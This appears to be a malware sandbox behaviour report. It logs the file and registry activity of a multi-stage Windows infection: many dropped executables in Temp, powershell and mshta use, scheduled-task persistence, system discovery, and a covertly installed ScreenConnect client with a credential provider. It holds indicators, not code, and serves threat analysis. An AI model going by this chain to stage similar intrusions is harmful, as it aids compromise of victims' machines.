File opened for modification C:\Windows\Installer\e595a99.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e595a9b.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{933D173F-6496-0F7D-53C4-FF46268B901A}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{933D173F-6496-0F7D-53C4-FF46268B901A}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\SystemTemp N/A N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A N/A
N/A N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000300101\systemdrive.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10038790101\45ab6d7c71.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\cxqswdu\bsnjgb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10038780101\bce8c2f94e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10038800101\edad866f30.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp0PZJULHHMQK22YB4KVAH3HBPL4NYETMR.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10038810101\67e0HNq.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10038760101\82ca9ecab5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10038820101\VBUN8fn.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000079521e240123cf490000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000079521e240000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090079521e24000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d79521e24000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000079521e2400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz N/A N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 N/A N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 N/A N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString N/A N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer N/A N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133851041635327434" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open\command C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\PackageCode = "F371D3396946D7F0354CFF6462B809A1" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E4BCFB79704FF87AB30ED9E9E548C002 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-3be09d9e5e840c20\shell\open\command C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387} C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E4BCFB79704FF87AB30ED9E9E548C002\F371D3396946D7F0354CFF6462B809A1 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\ = "ScreenConnect Client (3be09d9e5e840c20) Credential Provider" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Version = "402915332" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\ProductIcon = "C:\\Windows\\Installer\\{933D173F-6496-0F7D-53C4-FF46268B901A}\\DefaultIcon" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\URL Protocol C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.WindowsClient.exe\" \"%1\"" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F371D3396946D7F0354CFF6462B809A1\Full C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\3be09d9e5e840c20\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-3be09d9e5e840c20 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\UseOriginalUrlEncoding = "1" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\ProductName = "ScreenConnect Client (3be09d9e5e840c20)" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\3be09d9e5e840c20\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.WindowsCredentialProvider.dll" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F371D3396946D7F0354CFF6462B809A1 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1 C:\Windows\system32\msiexec.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\systemdrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\systemdrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\ProgramData\cxqswdu\bsnjgb.exe N/A
N/A N/A C:\ProgramData\cxqswdu\bsnjgb.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
